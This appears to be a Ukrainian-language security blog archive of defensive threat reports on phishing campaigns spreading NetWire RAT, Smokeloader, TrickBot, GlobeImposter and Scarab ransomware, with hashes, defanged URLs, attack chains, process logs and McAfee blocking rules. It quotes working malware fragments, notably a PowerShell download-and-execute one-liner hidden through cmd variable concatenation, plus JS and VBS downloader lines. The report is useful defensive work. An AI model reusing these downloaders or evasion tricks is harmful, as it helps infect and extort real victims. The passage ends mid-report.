Tag Archive | email

IOC_lzh_190718

Усім привіт.

Фіксуємо спроби доставки шкідливого коду через JS скрипти (WSH) у оболонці LZH архівів.

Нічого нового, проте у тих, хто не подбав про контроль/заборону WSH будуть проблеми.

Трохи аналітики:

  • фішинг примітивний, не персоналізований
  • скрипт один, містить два посилання
  • payload не кодований !This program cannot be run in DOS mode.
  • прав Адміністратора не потребує
  • на Office 2007 та 2010 вилітає з помилкою
  • кінцева мета payload поки не встановлена

Схема атаки

email attach lzh (JS) > WSH > GET > \Users\*\AppData\Roaming\Microsoft\Windows\Templates\random.exe

Зверніть увагу на скомпрометований сайт Полтавського обласного управління водних ресурсів, що розповсюджує malware:

Маркери

архів

SHA-256               7343bb8098af8785dfee2e9c3bb2edd109aca75a2f1a2f1890faf25a28f46029
File name            рахунок до оплати зг. дог. 57 ФОП Ушаньов Д.О.zip.lzh
File size 81.59 KB

скрипт

SHA-256               042e079b1acc7bec5076077b8d0df8582ec3b7b675e1777c3a91f3159f71ea24
File name            за оренду рах. №118 ФОП Ушаньов Д.О.xls.js
File size 57.94 KB

payload

SHA-256               3d2777b748e805c0463c0c6d0fef8280ad197bea1dd0a25e30ed71199989a6b9
File name            zakup.exe
File size 223 KB

Деобфускований скрипт:

“var path = wsh.SpecialFolders(“templates”)+”\\”+((Math.random()*999999)+9999|0)+”.exe”;

HTTP.Open(“GET”, “h11p:\poltavavodgosp{.} gov.ua/doc/zakup.exe”, false

{ HTTP.Open(“GET”, “h11p:\avtodoskadoc{.} top/zakupki/peremena.exe”, false)”

 

Мережа

194.0.200.13     poltavavodgosp{.} gov.ua     GET /doc/zakup.exe          Mozilla/4.0
149.129.215.193  avtodoskadoc{.} top          GET/zakupki/peremena.exe    Mozilla/4.0

 

Процеси

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\118.js"
"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\209790.exe"
C:\Windows\splwow64.exe 8192

Контрзаходи

  • Фільтр приєднань на рівні Email – див. тут
  • Заборона завантаження запускних на рівні Proxy – див. тут
  • Заборона створення та зчитування js, jse, vb, vbe та ін скриптових файлів в профілі користувача
  • Заборона створення та запуску нових exe в профілі користувача – див. тут
  • Заборона мережевого трафіку для WSH – див. тут
  • Деактивація WSH – див. тут
  • Фільтрація по User Agent на рівні Proxy

Будьте уважні та обережні.

VR

Advertisements

IOC_NetWire_RAT_250418

Доброго дня, панове.

Детальний звіт по сьогоднішній розсилці.

Цього разу через документи із макросами розповсюджували #NetWire RAT.

Цей тип шкідливого коду застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не блокують макроси, – високий, а для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Документ із макросом розмістили на Amazon AWS (знову, для обходу URL фільтрації)
  • Активація макросу відбувається при кліку на формі (Ок або “Х”)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Завантаження та запуск основної частини відбувається процесом winword
  • Основна частина зберігається у %Public% (фактично обходять %Temp%)
  • Не потребує прав Адміністратора

Інфікування відбувається так:


І так, проблеми будуть у тих, хто:

  • Не заблокували макроси (90% держ. установ та фінансових департаментів)
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)


Схема атаки:

email > URL > GET .doc > maco > GET 84.200.19.153/pen.exe > users\public\.exe

Маркери IOC:

файл приманка

SHA-256    16947cceab56ad5c98a588a23c656b8fc967702d027f8f9a0164bfc2738fc2b6
File name   Transactions_invalid001.doc
File size      425.5 KB

основна частина

SHA-256        079e3875726e57824b5357583a9ba746c5775a60c6355f5cced8024652817699
File name   pen.exe
File size      412 KB

Мережеві IOC:

Документ завантажується із Amazon AWS: (Увага! Посилання досі активне!)

h11ps://secured-banking00129.s3.amazonaws{.} com/Transactions_invalid001.doc

Основна частина завантажується із:

84.200.19.153    GET /pen.exe HTTP/1.1         Mozilla/4.0

Трафік скомпрометованої системи після запуску основної частини:

185.117.74.8      49622 → 4590 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1    TCP   66    

Активність по процесам:

Коли жертва відкриває завантажений документ-приманку запускається макрос.

Процес Winword відкриває з’єднання із 84.200.19.153 і намагається завантажити некодований payload.

Завантажений файл записується та запускається з каталогу %Public%

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Users\operator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\...\pen[1].exe"
"C:\Users\Public\.exe"

Після запуску основна частина закріплюється через HKU:

[HKEY_USERS\S-xxx\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Users\\Public\\.exe"
"printer"="C:\\Users\\Public\\.exe"

(Default)    c:\users\public\.exe     4/24/2018 4:12 PM     
printer      c:\users\public\.exe     4/24/2018 4:12 PM 

Після запуску зразок відправляє SYN пакети на порт 4590 хоста 185.117.74.8:

185.117.74.8      49622 → 4590 [SYN]

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com
  • Заборонити запуск макросів, якщо не використовуєте по роботі
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск дочірніх процесів для додатків MS Office (крім служби друку) користувацьке правило Access Protection (McAfee ENS)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_300118

Доброго дня, панове.

31 січня о другій половині дня були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядалися раніше тут, тут і тут).

Може використовуватися для збору інформації та/або для доставки ransomware чи засобів майнінгу криптовалют.

Приклад фішингу із приєднанням:

Трохи аналітики:

  • Зверніть увагу на претекст середньої якості (без підпису і з нормальними заголовками)
  • Рівень загрози – середній, для організацій, що прислухалися до наших попередніх рекомендацій – низький.
  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня а також 11 листопада
  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Сервер, що розповсюджує основну частину = сервер контролю
  • Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Зважаючи на “почерк” цієї команди, ми припускаємо, що могли бути й інші спроби доставки цього коду не лише з сервісів РФ, але й із скомпрометованих скриньок/серверів вітчизняних установ

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\5541.exe

Маркери IOC:

скрипт приманка:

File name гарантійний лист.js
SHA-256 aabd7951f147d05a2f92caf35f1fe45e43eb6a05deaab451e0086c74e4289e2f
File size 18.8 KB

адреса на яку вказує скрипт:

$env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe

основна частина:

File name crsse.exe >> %temp%\5541.exe
SHA-256 45b3091d63c462eda461bae08e3d781665ce10e3dacd6ef7169f630a11109a3e
File size 340 KB

Отже, запуск скрипта ініціює завантаження основної частини засобами Powershell

(!) зверніть увагу – на відміну від попередньої розсилки, передачу команд зробили з конкатенацією (розбили на шматки)

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\5541.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у (співпадає з попередньою розсилкою)

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
Chromium 
c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

(!) зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows (штатний режим) а з C:\Windows\SYSWOW64\

Мережеві IOC:

завантаження payload – станом на 10ту ранку 1го лютого досі активна!

45.32.179.137:80 HTTP enterwords[.]ru GET /uadoc/crsse.exe

трафік скомпрометованої системи – сервер контролю

45.32.179.137:80 HTTP abank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe та Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_GlobeImposter_211217

Доброго вечора, панове.

Вчора по обіді була зафіксована масова розсилка Globeimposter Ransomware.
Схожий зразок розсилали 30/11/17, проте тоді застосовували необфусковані VBS скрипти:


Цього разу метод доставки- обфускований JS. Шлях запису та ім’я файлу чітко задано в скрипті.
Payload не кодований.

Рівень загрози (для організацій котрі не вжили заходів щодо скриптів) – середній.

Для тих, хто прислухався до наших попередніх рекомендаційнизький.

Схема атаки:

email > Attach: 7z(.JS)  > WSCRIPT > GET /psndhFTwd??MYBlBYTYWjc=MYBlBYTYWjc > %temp%\MYBlBYTYWjc2.exe

Маркери IOC:

приманка у вигляді JS файлу яку жертва має сприйняти за зображення відсканованого документу:

File name IMG_20171221_345358418.js
SHA-256 d5977c433a0d03416d79e78cf765add480ebbc120a80b5d2d96254ca3c37b2e1
File size 14.54 KB

після запуску JS він обробляється процесом WSCript, який і виконує завантаження основного тіла:

“C:\Windows\System32\WScript.exe” “C:\Users\operator\Desktop\IMG_20171221_345358418.js”

File name psndhFTwd >> %temp%\MYBlBYTYWjc2.exe 
SHA-256 410efb1938ab06cf29acbcd24a3eca81c5d6d0c84778997adad1b5f0ecfb455c
File size 198.5 KB

після завантаження основне тіло записується в %temp% і запускається через виклик від імені процесу cmd

cmd.exe /c START “”  C:\tmp/MYBlBYTYWjc2.exeC:\tmp/MYBlBYTYWjc2.exe

C:\tmp/MYBlBYTYWjc2.exe

основне тіло після завантаження копіює себе у AppData і додає в перелік автозавантаження:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

BrowserUpdateCheck c:\users\operator\appdata\roaming\myblbytywjc2.exe

Шифрує одразу без підвищення прав користувача.

Зашифровані файли отримують розширення ..doc

# # # # # #

Додатково надаю спрацювання по правилам захисту доступу (блокування було деактивоване навмисне щоб отримати повні звіти)

VSE_AP_LogOnly

APM11\operator C:\WINDOWS\EXPLORER.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\EXPLORER.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE C:\TMP\TEMPORARY INTERNET FILES\COUNTERS.DAT Anti-spyware Maximum Protection:Prevent execution of scripts from the Temp folder Action blocked : Write
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE Common Maximum Protection:Prevent HTTP communication 185.111.232.52:80
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\USERS\OPERATOR\APPDATA\ROAMING\MYBLBYTYWJC2.EXE User-defined Rules:_EXE_pro_BLK Action blocked : Create
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\BROWSERUPDATECHECK Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Blocked by Access Protection rule 
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\VSE\* Common Standard Protection:Prevent modification of McAfee files and settings Action blocked : Write
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\USERS\OPERATOR\APPDATA\ROAMING\MOZILLA\FIREFOX\* Common Standard Protection:Protect Mozilla & FireFox files and settings Action blocked : Write
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\TMP\TEMPORARY INTERNET FILES\CONTENT.IE5\CONTAINER.DAT Anti-virus Maximum Protection:Protect cached files from password and email address stealers Action blocked : Write

Мережеві IOC:

завантаження основного тіла:

185.111.232.52:80 www.seffafkartvizitim[.]com GET /psndhFTwd??MYBlBYTYWjc=MYBlBYTYWjc

Додаткові маркери за даними malware-traffic-analysis.net/

Сервери які розповсюджують основну частину:

h11p://www.g-v-s[.]ru/psndhFTwd?
h11p://www.homody[.]com/psndhFTwd?
h11p://www.mcwhorterdesign[.]com/psndhFTwd?
h11p://www.seffafkartvizitim[.]com/psndhFTwd?
h11p://www.topanswertips[.]info/psndhFTwd?
h11p://www.tuminsaat[.]com/psndhFTwd?
h11p://www.rdpassistance[.]com/PuaneYDG?
h11p://www.rutor[.]space/PuaneYDG?
h11p://www.sclionionescu[.]ro/PuaneYDG?
h11p://www.servicetrade24[.]ru/PuaneYDG?
h11p://www.soslavanderia[.]com.co/PuaneYDG?
h11p://www.vseteplo[.]by/PuaneYDG?

Теми листів:

 Subject: Emailing: IMG_20171221_970542999, IMG_20171221_105610661, IMG_20171221_330199554_HDR
 Subject: Emailing: IMG_20171221_680272343, IMG_20171221_209718394, IMG_20171221_691812068_HDR
 Subject: Emailing: IMG_20171221_855525309, IMG_20171221_558874225, IMG_20171221_633843547_HDR
 Subject: Emailing: IMG_20171221_093043189, IMG_20171221_414525016, IMG_20171221_777953000_HDR
 Subject: Emailing: IMG_20171221_582764807, IMG_20171221_829866923, IMG_20171221_194629228_HDR
 Subject: Emailing: IMG_20171221_501005613, IMG_20171221_798070330, IMG_20171221_271932520_HDR
 Subject: Emailing: IMG_20171221_870284477, IMG_20171221_993512867, IMG_20171221_458229113_HDR
 Subject: Emailing: IMG_20171222_924030478, IMG_20171222_104259967, IMG_20171222_350843050_HDR
 Subject: Emailing: IMG_20171221_167023012, IMG_20171221_911069898, IMG_20171221_259887793_HDR
 Subject: Emailing: IMG_20171222_358078220, IMG_20171222_235116613, IMG_20171222_702416975_HDR

Контрольні суми приєднань:

 ca75b8a86fed3a725a2eaae1a37ff1277ec267818d53a963d4ae1c4e7573859a - IMG_20171221_312327133.js
 3e0a6f75b7a6bd527d26de7c23d76fada787e02a496fb2fb99207217385fb15a - IMG_20171221_498152824.js
 a9929327b937efcb1a0d39bd6bddaaa450629c3d74cde81c7167feb4f33c794d - IMG_20171221_499864685.js
 e349e7c6d04157dac849967da08033b685730f07f382f90a693943296fccd5bb - IMG_20171221_508871502.js
 2570fea4e10fb51e559d0d2dc9714837e25870b5e5413e1931a5c8cf39ba6b1c - IMG_20171221_555275412.js
 c01a8ef796ad0d79c2e0d08a5da677242da0b4d24743124c134e6f7f4992bb7c - IMG_20171221_698827418.js
 5314187cb13387df3759afa81fe0c4d97c4e35e2717e0000db3181ab1bde61a5 - IMG_20171221_725213643.js
 063b9d113fc153dfa153efee1d496b72230c89ca2623cca69ab6c7ecefde0559 - IMG_20171221_797605201.js
 4b3c49b00a5c40af3cad9ec02bc96baf61edd0f645fb2cb177f20bfb6f3f71a2 - IMG_20171221_836062519.js
 57e6d4f037eecc0af58adc58fe7c4b43efd96f05c321b9025d53810131bdd5fd - IMG_20171221_968347573.js

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення скриптових файлів

Name: _script_BLK
Action: Block, Report
Process to include: * 
Processes to exclude: -
Subrule: _script_files
Files
+ Read  
+ Create
Targets Include: 
**\Users\*\**\*.JS
**\Users\*\**\*.JSE
**\Users\*\**\*.VBS
**\Users\*\**\*.WSF

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Create
+ Read
+ Execute

Контрзаходи:
  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування завантаження запусних файлів (payload не шифрований)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Блокування доступу до мережі Інтернет для процесу WSCript (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE та скриптів з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_trickbot_131217

Доброго ранку, панове.

Вчора одразу з декількох джерел було зафіксовано розсилку #trickbot (модульний троянський шкідливий код, спеціалізується на крадіжці даних ДБО)

На відміну від попередніх розсилок тут і тут, цього разу замість скриптів використовували документи MS Word із макросами.

Рівень загрози (для організацій що не заблокували макроси) – середній.

Для тих, хто прислухався до моїх рекомендацій із попередніх розсилок – низький.

Трохи аналітики:

  • GET запит ідентифікує кампанію
  • ім’я payload чітко вказане в коді макросу
  • payload не кодований/шифрований
  • зловмисники змінили фокус із скриптів на макроси – надалі будуть комбінувати різні способи доставки

Схема атаки:

email > Attach: A217****-*9.doc  > WINWORD > GET zGdfwyGH83 > %temp%\rondoal8.exe

Маркери IOC:

фішингові листи мали наступний вигляд:

на аналіз було надано два файли-приманки, схема інфікування та основна частина – однакові, відрізняються лише адреси завантаження

File name A2173854-79.doc
SHA-256 2b80c8eb48b142d415483f9d8bb8bdd400024f035777df78cf46d5b272fb68c4
File size 159 KB

File name A2170607-29.doc
SHA-256 9edf7c18cfb2bbd818e5177b9a0aedba01e02389ceca99bd4338e46c55407bc1
File size 159 KB

після відкриття файлу та активації макросів відбувається завантаження основної частини через процес WINWORD та її запуск через CMD

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
cmd.exe /c START "" C:\tmp\rondoal8.exe

 

File name zGdfwyGH83 >> rondoal8.exe 
SHA-256 a7e40660025a2f92bf5b27a429c2a65038932203d7d6c33168f01c47b34868fa
File size 443.75 KB

основна частина після запуску дублює себе у профіль користувача:

C:\tmp\rondoal8.exe
C:\Users\operator\AppData\Roaming\services\rpoepam8.exe

додає себе задачею у планувальник системи:

\services update c:\users\operator\appdata\roaming\services\rpoepam8.exe 11.12.2016 23:50

після чого інжектує себе у системний svchost та ініціює мережеві комунікації через нього – трафік скомпрометованої системи

A2170607-29.doc

svchost.exe 4928 TCP 10.0.2.15 49201 76.16.105.16 449 SYN_SENT
svchost.exe 4928 TCP 10.0.2.15 49200 184.73.220.206 80 ESTABLISHED

A2173854-79.doc

svchost.exe 3496 TCP 10.0.2.15 49201 195.133.147.140 443 ESTABLISHED 
svchost.exe 3496 TCP 10.0.2.15 49202 178.18.231.97 80 ESTABLISHED
svchost.exe 3496 TCP 10.0.2.15 49203 193.124.117.189 447 ESTABLISHED
svchost.exe 3496 TCP 10.0.2.15 49204 80.87.199.190 443 ESTABLISHED

у випадку із приманкою A2173854-79.doc відбулося також довантаження додаткового модулю

File name tmpE2B2.tmp
SHA-256 8644312f0870c579f2bb54e6f71ea6969ef2fea943ed87543663f78948302818
File size 750.64 KB

після чого запуск та видалення:

svchost.exe
"C:\tmp\tmpE2B2.tmp"
cmd /c C:\tmp\1.bat
ping  localhost -n 2

# # # # # #

Додатково надаю спрацювання по правилам захисту доступу (блокування було деактивоване навмисне щоб отримати повні звіти)

APM11\operator ran WINWORD.EXE, which accessed C:\WINDOWS\SYSWOW64\CMD.EXE, violating the rule "_office_BLK_cmd_power". Allowed_by_VR
APM11\operator ran CMD.EXE, which accessed C:\USERS\OPERATOR\DESKTOP\\ , violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran CMD.EXE, which accessed C:\TMP\RONDOAL8.EXE, violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran RONDOAL8.EXE, which accessed C:\USERS\OPERATOR\DESKTOP\\ , violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran RONDOAL8.EXE, which accessed C:\TMP\NSCAEB.TMP\SYSTEM.DLL, violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran EXPLORER.EXE, which accessed C:\TMP\RONDOAL8.EXE, violating the rule "Running files from common user folders by common programs". Allowed_by_VR
APM11\operator ran RONDOAL8.EXE, which accessed C:\TMP\RONDOAL8.EXE, violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran RONDOAL8.EXE, which accessed C:\USERS\OPERATOR\APPDATA\ROAMING\SERVICES\RPOEPAM8.EXE, violating the rule "VR_antiransom". Allowed_by_VR
APM11\operator ran RONDOAL8.EXE, which accessed C:\USERS\OPERATOR\APPDATA\ROAMING\SERVICES\RPOEPAM8.EXE, violating the rule "VR_antiransom". Allowed_by_VR
APM11\operator ran RONDOAL8.EXE, which accessed C:\USERS\OPERATOR\APPDATA\ROAMING\SERVICES\RPOEPAM8.EXE, violating the rule "VR_antiransom". Allowed_by_VR
APM11\operator ran RPOEPAM8.EXE, which accessed C:\TMP\NSA51E7.TMP\SYSTEM.DLL, violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran TMPE2B2.TMP, which accessed C:\TMP\1.BAT, violating the rule "Running files from common user folders". Allowed_by_VR
APM11\operator ran TASKENG.EXE, which accessed C:\USERS\OPERATOR\APPDATA\ROAMING\SERVICES\RPOEPAM8.EXE, violating the rule "VR_antiransom". Allowed_by_VR

Мережеві IOC:

завантаження основного тіла:

A2170607-29.doc

198.54.126.51 HTTP 282 GET /zGdfwyGH83 HTTP/1.1

A2173854-79.doc

83.175.70.7 HTTP 287 GET /zGdfwyGH83 HTTP/1.1

відправка даних про Public IP:

A2170607-29.doc

184.73.220.206 HTTP 244 GET / HTTP/1.1

A2173854-79.doc

158.69.26.138 HTTP 248 GET /text HTTP/1.1

довантаження модулів:

A2173854-79.doc

195.123.218.13 HTTP 253 GET /file.exe HTTP/1.1

Що можна було зробити аби уникнути інфікування ?

  1. Деактивація макросів через групові політики або параметри MS Office
  2. Блокування вихідного трафіку для процесу Winword.exe
  3. Заборона запуску дочірніх процесів (зокрема cmd та powershell) для додатків MS Office
  4. Заборона створення EXE в каталозі профілю користувача (приклади правил наведені нижче)
  5. Заборона завантаження скриптових та запусних файлів (payload не шифрований)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона запуску дочірніх процесів (приклад правила дивіться нижче)

Name: _office_BLK_cmd_power
Action: Block, Report
Process to include: WINWORD.EXE, EXCEL.EXE, OUTLOOK.EXE, POWERPNT.EXE 
Processes to exclude: -
Subrule: _child_proc_BLK
Files
+ Read  
+ Execute
Targets Include: 
powershell.exe
cmd.exe

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Create
+ Read
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Заборона створення дочірніх процесів cmd та powershell для додатків MS Office (буде захищати від макросів, DDE та OLE варіацій)
  • Блокування доступу до мережі Інтернет для процесу WINWORD (по аналогії із варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Деактивація макросів через GPO або налаштування MS Office
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Scarab_231117

Доброго дня, панове.

Звіт стосується розсилок Scarab Ransomware, які відбувалися на минулому тижні. Публікую для академічного розгляду оскільки:

Рівень загрози – нижче середнього. Для тих, хто прислухався до моїх рекомендаційнизький.

Звернень по цьому типу мені не надходило, а кім того, технічно механізм інфікування Scarab не відрізняється від інших (Locky, Cerber), які я вже розглядав.

Проте зважаючи на те, яку увагу (з подачі Кіберполіції) ЗМІ приділили розсилкам саме цього зразка – вирішив усе ж таки його розібрати.

Не без того, щоб вкотре нагадати вам прості та дієві методи захисту.

Трохи аналітики:

  • Шифрування стійке. На даний момент способу відновити файли – не знайдено
  • Факти інфікування даним класом шкідливого коду говорять про низький рівень обізнаності
  • Scarab спричинив багато галасу, бо на відміну від Locky, він шифрує одразу без перевірки умов, ще раз – Scarab шифрує завжди там, де був запущений
  • А це значить, що жертви Scarab ігнорували попередні інциденти тому що, розсилки з Locky не призводили до шифрування
  • Метод доставки – масовий, неперсоніфікований, нелокалізований, низькоякісний фішинг типу “відскановані документи”
  • Тип приманки – необфусковані VBS скрипти в архівах 7zip
  • Скрипти містять від 2 до 3 посилань на завантаження основної частини
  • Активація та шифрування відбуваються з правами користувача і можуть проходити без мережевих з’єднань (offline)
  • Ім’я основної частини чітко задане кодом скрипту і не змінюється
  • Перед початком шифрування зразок намагається видалити Shadow Copy, якщо права не надавати – шифрування продовжиться, просто без видалення тіньових копій

Схема атаки:

email > Attach 7z (VBS) > WSCript > GET JHgd476? > %temp%\VJMAQASU.exe

Маркери IOC:

приклади листів:

один із скриптів-приманок:

File name image2017-11-22-5379282.vbs
SHA-256 fd072a6c2fe9187f799a27e21c27fc67dd2f145ccbc0faa917f37469d0d26974
File size 3.8 KB

містить три посилання на завантаження основної частини:

krapivec = Array("miamirecyclecenters[.]com/JHgd476?","pamplonarecados[.]com/JHgd476?","hard-grooves[.]com/JHgd476?")

Останнє – досі активно і на звернення видає основну частину:

File name JHgd476  >> %temp%\VJMAQASU.exe
SHA-256 7a60e9f0c00bcf5791d898c84c26f484b4c671223f6121dc3608970d8bf8fe4f
File size 356.5 KB

Приклад запуску без надання привілеїв:

Приклад запуску із наданням привілеїв через UAC:

Запуск скрипту приводить до завантаження основної частини за шляхом %temp%\VJMAQASU.exe

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\image2017-11-22-5379282.vbs" 
"C:\Windows\System32\cmd.exe" /c call "C:\tmp\VJMAQASU.exe"
"C:\tmp\VJMAQASU.exe"

Після запуску Scarab через cmd.exe копіює своє тіло у %AppData%\Roaming\sevnz.exe

Та намагається отримати підвищення привілеїв для видалення тіньових копій (UAC)

